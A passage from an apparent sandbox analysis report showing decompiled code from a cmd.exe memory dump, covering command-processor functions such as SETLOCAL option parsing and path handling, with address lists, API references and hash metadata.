														_t177 = HeapAlloc(GetProcessHeap(), 8, _t214 + _t214);
														 *_t223 = _t177;
														__eflags = _t177;
														if(_t177 == 0) {
															goto L96;
														} else {
															_t98 =  *0xdc3cb8;
															__eflags = _t98;
															if(_t98 == 0) {
																_t98 = 0xdc3ab0;
															}
															E00D91040(_t177, _t214, _t98);
															_t100 = E00D93B2C(_t177);
															 *(_t223 + 4) = _t100;
															__eflags = _t100;
															if(_t100 == 0) {
																goto L96;
															} else {
																_t178 =  *0xdc3cc4;
																 *((char*)(_t223 + 8)) =  *0xdc3cc9;
																 *((char*)(_t223 + 9)) =  *0xdc3cc8;
																 *(_t178 + 0x90 +  *(_t178 + 0x14) * 4) = _t223;
																_t104 =  *0xdc3cd8;
																 *(_t178 + 0x14) =  *(_t178 + 0x14) + 1;
																 *((intOrPtr*)(_t178 + 0xc)) = _t104;
																__eflags =  *((intOrPtr*)(_t178 + 0x10)) - _t104;
																if( *((intOrPtr*)(_t178 + 0x10)) < _t104) {
																	 *((intOrPtr*)(_t178 + 0x10)) = _t104;
																}
																_t225 = E00D8EA40( *((intOrPtr*)( *((intOrPtr*)(_t162 + 8)) + 0x3c)), 0, 0);
																_t107 = 0;
																 *0xdbb8b0 = 0;
																while(1) {
																	__eflags =  *_t225 - _t107;
																	if( *_t225 == _t107) {
																		break;
																	}
																	__imp___wcsicmp(_t225, L"ENABLEEXTENSIONS");
																	__eflags = _t107;
																	if(_t107 != 0) {
																		__imp___wcsicmp(_t225, L"DISABLEEXTENSIONS");
																		__eflags = _t107;
																		if(_t107 == 0) {
																			 *0xdc3cc9 = 0;
																			goto L58;
																		} else {
																			__imp___wcsicmp(_t225, L"ENABLEDELAYEDEXPANSION");
																			__eflags = _t107;
																			if(_t107 != 0) {
																				__imp___wcsicmp(L"DISABLEDELAYEDEXPANSION");
																				_t189 = _t225;
																				__eflags = _t107;
																				if(_t107 != 0) {
																					__eflags =  *_t225;
																					if( *_t225 == 0) {
																						goto L58;
																					} else {
																						_push(0);
																						_push(0x400023a6);
																						E00D8C5A2(_t189);
																						_t94 = 1;
																						 *0xdbb8b0 = 1;
																					}
																				} else {
																					 *0xdc3cc8 = _t107;
																					goto L58;
																				}
																			} else {
																				 *0xdc3cc8 = 1;
																				goto L58;
																			}
																		}
																	} else {
																		 *0xdc3cc9 = 1;
																		L58:
																		_t225 = E00D8D7E6(_t225);
																		_t107 = 0;
																		__eflags = 0;
																		continue;
																	}
																	goto L63;
																}
																_t94 = 0;
																__eflags = 0;
															}
														}
													}
													L63:
													return _t94;
												} else {
													 *(_t162 + 0xc) = _t88;
													_t162 = _t88;
													 *((intOrPtr*)(_t88 + 0xc)) = 0;
													_t87 = _t212[0x12];
													_v40 = _t162;
													goto L37;
												}
											} else {
												L37:
												_t212[0x12] = _t87 + 1;
												 *_t162 = E00D9297B(E00D922C0(_t162, _t220));
												 *((char*)(_t162 + 8)) = 1;
												goto L34;
											}
											goto L102;
										}
									}
								} else {
									E00D86980(_t212);
									return _t162;
								}
							} else {
								_t206 = 0x20;
								while(1) {
									_t80 =  *_t219 & 0x0000ffff;
									if(_t80 == 0 || _t80 > _t206) {
										goto L11;
									}
									_t219 =  &(_t219[0]);
									if(_t219 != 0) {
										continue;
									}
									goto L11;
								}
								goto L11;
							}
						}
					}
				}
				L102:
			}

0x00d85e73
0x00d85e75
0x00d85e76
0x00d85e7a
0x00d85e7d
0x00d85e7f
0x00d85e84
0x00d85f0d
0x00d85f10
0x00000000
0x00000000
0x00000000
0x00000000
0x00d85e8a
0x00d85e8c
0x00d85e8d
0x00d85e8d
0x00d85e93
0x00000000
0x00000000
0x00d85f35
0x00d85f35
0x00d85f38
0x00000000
0x00000000
0x00d85f3e
0x00000000
0x00d85f38
0x00d85ea0
0x00000000
0x00d85ea2
0x00d85eaa
0x00d85eb0
0x00d85eb5
0x00d85edf
0x00d85ee1
0x00d85eed
0x00d85ef3
0x00d85ef9
0x00d85efb
0x00d85efe
0x00d85f09
0x00d85f0b
0x00d85f0b
0x00d85f09
0x00d85ef9
0x00000000
0x00d85eb7
0x00d85eb7
0x00d85ebd
0x00d85ec4
0x00d85ec7
0x00d85f16
0x00d85f1d
0x00d9a76e
0x00d9a76e
0x00d9a774
0x00d9a779
0x00d9a77f
0x00d9a786
0x00d9a786
0x00d9a78b
0x00d9a791
0x00d9a792
0x00d9a795
0x00d9a797
0x00d9a79d
0x00d9a79d
0x00d9a79f
0x00d9a7a2
0x00d9a7a5
0x00d9a7a5
0x00d9a7a9
0x00d9a7ac
0x00d9a7ac
0x00d8c2db
0x00d8c2de
0x00d8c2e1
0x00d8c3c8
0x00d8c3c8
0x00d8c3c8
0x00000000
0x00000000
0x00d8c2e7
0x00d8c2e9
0x00d8c2ea
0x00d8c2ed
0x00d8c2f0
0x00000000
0x00000000
0x00d8c2f6
0x00d8c2f6
0x00d8c2f9
0x00d8c2fb
0x00d8c2ff
0x00d8c302
0x00d9a7b6
0x00d9a7ba
0x00d9a7ba
0x00d8c308
0x00d8c30b
0x00d8c311
0x00d8c314
0x00d8c31b
0x00d8c324
0x00d8c325
0x00d8c325
0x00d8c328
0x00d9a8c7
0x00d9a8cc
0x00d9a8ce
0x00d9a8cf
0x00d9a8d4
0x00d9a8db
0x00d9a8e1
0x00000000
0x00d8c32e
0x00d8c32f
0x00d8c32f
0x00d8c332
0x00d9a7f0
0x00d9a7f4
0x00d9a829
0x00d9a831
0x00d9a836
0x00d9a838
0x00000000
0x00d9a83e
0x00d9a83e
0x00d9a842
0x00d9a848
0x00d9a848
0x00000000
0x00d9a842
0x00d9a7f6
0x00d9a7f6
0x00d9a7f9
0x00d9a7fc
0x00d9a7fc
0x00d9a7ff
0x00d9a802
0x00d9a802
0x00d9a80a
0x00d9a80c
0x00d9a80f
0x00000000
0x00d9a815
0x00d9a817
0x00d9a81e
0x00000000
0x00d9a81e
0x00d9a80f
0x00d8c338
0x00d8c338
0x00d8c338
0x00d8c33b
0x00d8c362
0x00d8c366
0x00d8c368
0x00d9a7e6
0x00d8c36e
0x00d8c36e
0x00d8c36e
0x00d8c36e
0x00000000
0x00d8c33d
0x00d8c33d
0x00d8c33d
0x00d8c340
0x00d9a7ca
0x00d9a7ce
0x00d9a7d0
0x00d9a7dc
0x00d9a7d2
0x00d9a7d2
0x00d9a7d2
0x00000000
0x00d8c346
0x00d8c346
0x00d8c346
0x00d8c349
0x00d8c3dc
0x00d8c3df
0x00d9a886
0x00d9a887
0x00d9a88f
0x00d9a895
0x00d9a8a2
0x00d9a8a3
0x00d9a8a5
0x00000000
0x00d8c3e5
0x00d8c3e5
0x00d8c3e9
0x00d8c3eb
0x00d8c403
0x00d8c3ed
0x00d8c3ed
0x00d8c3ed
0x00d8c3ed
0x00d8c3f0
0x00d8c3f4
0x00d8c3f7
0x00d8c3fc
0x00000000
0x00d8c3fe
0x00d9a87b
0x00d9a87e
0x00d9a881
0x00000000
0x00d9a881
0x00d8c3fc
0x00d8c34f
0x00d8c34f
0x00d8c353
0x00d8c355
0x00d9a7c0
0x00d8c35b
0x00d8c35b
0x00d8c35b
0x00d8c373
0x00d8c373
0x00d8c375
0x00d8c377
0x00d8c37a
0x00d8c37f
0x00d9a8ac
0x00d9a8af
0x00d9a8af
0x00d9a8b5
0x00d9a8b6
0x00d9a8b6
0x00d9a8b8
0x00d9a8bd
0x00d9a8bd
0x00d9a8e7
0x00d9a8e9
0x00d8c3ca
0x00d8c3cd
0x00d8c3ce
0x00d8c3cf
0x00d8c3d1
0x00d8c3da
0x00d8c385
0x00d8c385
0x00d8c385
0x00d8c388
0x00d8c38b
0x00d8c392
0x00d8c394
0x00d8c397
0x00d8c39a
0x00000000
0x00d8c39c
0x00d8c39c
0x00000000
0x00d8c39c
0x00d8c39a
0x00d8c37f
0x00d8c349
0x00d8c340
0x00d8c33b
0x00d8c332
0x00000000
0x00d8c3a3
0x00d8c3a3
0x00d8c3a6
0x00d8c3a8
0x00d9a855
0x00d9a856
0x00d9a85b
0x00d9a85d
0x00d9a8ef
0x00d9a8fb
0x00d9a901
0x00d9a902
0x00d8c471
0x00d8c473
0x00d8c473
0x00d8c476
0x00d8c479
0x00d8c479
0x00d8c486
0x00d8c496
0x00d8c498
0x00d8c49a
0x00d9a91a
0x00d9a91c
0x00d8c4a0
0x00d8c4b3
0x00d8c4b5
0x00d8c4b7
0x00d8c4b9
0x00000000
0x00d8c4bf
0x00d8c4bf
0x00d8c4c4
0x00d8c4c6
0x00d9a922
0x00d9a922
0x00d8c4cf
0x00d8c4d4
0x00d8c4d9
0x00d8c4dc
0x00d8c4de
0x00000000
0x00d8c4e4
0x00d8c4e4
0x00d8c4ef
0x00d8c4f7
0x00d8c4fd
0x00d8c504
0x00d8c509
0x00d8c50c
0x00d8c50f
0x00d8c512
0x00d8c514
0x00d8c514
0x00d8c527
0x00d8c529
0x00d8c52b
0x00d8c56c
0x00d8c56c
0x00d8c56f
0x00000000
0x00000000
0x00d8c577
0x00d8c57f
0x00d8c581
0x00d8c538
0x00d8c540
0x00d8c542
0x00d8c59b
0x00000000
0x00d8c544
0x00d8c54a
0x00d8c552
0x00d8c554
0x00d9a932
0x00d9a939
0x00d9a93a
0x00d9a93c
0x00d9a94a
0x00d9a94d
0x00000000
0x00d9a953
0x00d9a953
0x00d9a954
0x00d9a959
0x00d9a961
0x00d9a963
0x00d9a963
0x00d9a93e
0x00d9a93e
0x00000000
0x00d9a93e
0x00d8c55a
0x00d8c55a
0x00000000
0x00d8c55a
0x00d8c554
0x00d8c583
0x00d8c583
0x00d8c561
0x00d8c568
0x00d8c56a
0x00d8c56a
0x00000000
0x00d8c56a
0x00000000
0x00d8c581
0x00d8c58c
0x00d8c58c
0x00d8c58c
0x00d8c4de
0x00d8c4b9
0x00d8c58e
0x00d8c596
0x00d9a863
0x00d9a863
0x00d9a868
0x00d9a86a
0x00d9a86d
0x00d9a870
0x00000000
0x00d9a870
0x00d8c3ae
0x00d8c3ae
0x00d8c3b1
0x00d8c3c0
0x00d8c3c2
0x00000000
0x00d8c3c2
0x00000000
0x00d8c3a8
0x00d8c2e7
0x00d85f23
0x00d85f24
0x00d85f31
0x00d85f31
0x00d85ec9
0x00d85ecb
0x00d85ecc
0x00d85ecc
0x00d85ed2
0x00000000
0x00000000
0x00d85eda
0x00d85edd
0x00000000
0x00000000
0x00000000
0x00d85edd
0x00000000
0x00d85ecc
0x00d85ec7
0x00d85eb5
0x00d85ea0
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 00D85EAA
swscanf.MSVCRT ref: 00D85EED

Strings

:EOF, xrefs: 00D85EBD

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: e6a8079b559699f3045454107428dd5d532ea62c54d75887a591c114792e6448
Instruction ID: 84aeed9f4ce25b9884a80067ef8a44f270165b8c8d663800c865300b2531ff42
Opcode Fuzzy Hash: e6a8079b559699f3045454107428dd5d532ea62c54d75887a591c114792e6448
Instruction Fuzzy Hash: 65A1CF71A14216DBDF24EFA8D845BBAB7E4EF04310F18802AE882D7281E775DD42C7B5

Uniqueness

Uniqueness Score: -1.00%

Function 00D858A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
nativeCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D858A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0xdc8064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0xdbb8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0xdad560 = _t22;
				L00D982C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t48 = 0xdc3ab0;
					}
					_t51 =  *0xdc3cc0;
					E00D936CB(_t44, _t48,  *0xdc3cc0, 0);
					 *0xdad56c = 0;
					 *0xdad5ac = 0;
					 *0xdad564 = 1;
					 *0xdad55c = 1;
					 *0xdad0c0 = 1;
					_t29 =  *0xdad5dc; // 0x0
					_t49 = 0x24;
					 *0xdad5a8 = 0;
					 *0xdad5a4 = 0;
					 *0xdad568 = _t29;
					_t62 = E00D900B0(_t49);
					if(_t62 == 0) {
						L14:
						E00DA9287(_t49);
						__imp__longjmp(0xdbb8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E00D900B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E00D8450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0xdad55c == 4) {
								L15:
								E00DA8664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E00D848E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E00D9274C(0xdc3d00, 0x104, L"%9d",  *0xdad56c);
					E00D8C108(_t49, 0x2336, 1, 0xdc3d00);
					 *0xdad560 =  *0xdc8064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}

0x00d858a7
0x00d858a9
0x00d858aa
0x00d858b5
0x00d858be
0x00d858c9
0x00d858cc
0x00d858cd
0x00d858d2
0x00d858d5
0x00d858dc
0x00d858e1
0x00d858ea
0x00d997fc
0x00d997fd
0x00d858f0
0x00d858f0
0x00d858f8
0x00d99805
0x00d99805
0x00d858fe
0x00d85905
0x00d8590c
0x00d85913
0x00d8591b
0x00d85920
0x00d85925
0x00d8592a
0x00d8592f
0x00d85930
0x00d85936
0x00d8593c
0x00d85946
0x00d8594a
0x00d9980f
0x00d9980f
0x00d9981b
0x00000000
0x00d85950
0x00d85950
0x00d85954
0x00d85957
0x00d85958
0x00d8595b
0x00d85963
0x00d85967
0x00000000
0x00d8596d
0x00d85972
0x00d85976
0x00d8597a
0x00d8597d
0x00d85980
0x00d85991
0x00d85997
0x00d8599c
0x00d859a3
0x00d859af
0x00d859af
0x00d859bc
0x00d859be
0x00d859c0
0x00d99821
0x00d99821
0x00d99826
0x00d859c6
0x00d859cb
0x00d859cd
0x00d859cd
0x00d859c0
0x00d85967
0x00d859e6
0x00d859f3
0x00d85a02
0x00d85a02
0x00d85a0b
0x00d85a17
0x00d85a17
0x00d85a27

APIs

_setjmp3.MSVCRT ref: 00D858E1

Part of subcall function 00D936CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,00D8590A,00000000), ref: 00D936F0

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 00D85991
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 00D859AF
NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 00D85A17
longjmp.MSVCRT(00DBB8B8,00000001,00000000), ref: 00D9981B

Strings

%9d, xrefs: 00D859DB

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
String ID: %9d
API String ID: 4212706909-2241623522
Opcode ID: e28e5902bccb32d85f0e4ca7e5ef8b19e5568f5af5cddf75b325300fdd2eddd2
Instruction ID: 839068d7d129678896e2511937b184dc3f88ad3a8429810d968fee79c3bfad9e
Opcode Fuzzy Hash: e28e5902bccb32d85f0e4ca7e5ef8b19e5568f5af5cddf75b325300fdd2eddd2
Instruction Fuzzy Hash: 4941AFB0E04311AFDB10EF69AC46A6ABBF9EB46710F14421EE515E7390EB709901CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D85226, Relevance: 9.5, APIs: 6, Instructions: 458
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00D85226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0xdad0b4; // 0x35c4fbb8
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E00D90C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E00D96FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0xdc3cb8;
					if( *0xdc3cb8 == 0) {
						_t161 = 0xdc3ab0;
					}
					E00D91040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E00DA9583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E00D918C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E00D91040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E00D91040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E00D85400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E00DA985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E00DA985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E00D85846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E00D92349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E00D918C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}

0x00d85226
0x00d85229
0x00d8522b
0x00d8522c
0x00d85237
0x00d8523b
0x00d85243
0x00d8524a
0x00d8524f
0x00d85257
0x00d85259
0x00d8525e
0x00d8526c
0x00d85273
0x00d85279
0x00d8527f
0x00d85285
0x00d85288
0x00d8528c
0x00d852b5
0x00d853f5
0x00d853d2
0x00d853d5
0x00d853e1
0x00d853e4
0x00d853f0
0x00d853f0
0x00d852c1
0x00d852c4
0x00d852cc
0x00d9915f
0x00d99166
0x00d99168
0x00d99168
0x00d99173
0x00d99178
0x00d9917e
0x00d99186
0x00d99187
0x00d9918a
0x00d9918a
0x00d9918d
0x00d9918f
0x00d99194
0x00d9919c
0x00d991a6
0x00d991a7
0x00d991ac
0x00d991d3
0x00d991d5
0x00d991d8
0x00d991dc
0x00d991e3
0x00d9929f
0x00d9929f
0x00d992a7
0x00d992aa
0x00d992aa
0x00d992ad
0x00d992af
0x00d992be
0x00d992c7
0x00d992ca
0x00d992cc
0x00d992d1
0x00d992d7
0x00d992d7
0x00d992da
0x00d992dc
0x00d992ed
0x00d992fd
0x00d99294
0x00d99294
0x00d994f9
0x00d994f9
0x00d853a5
0x00d853a9
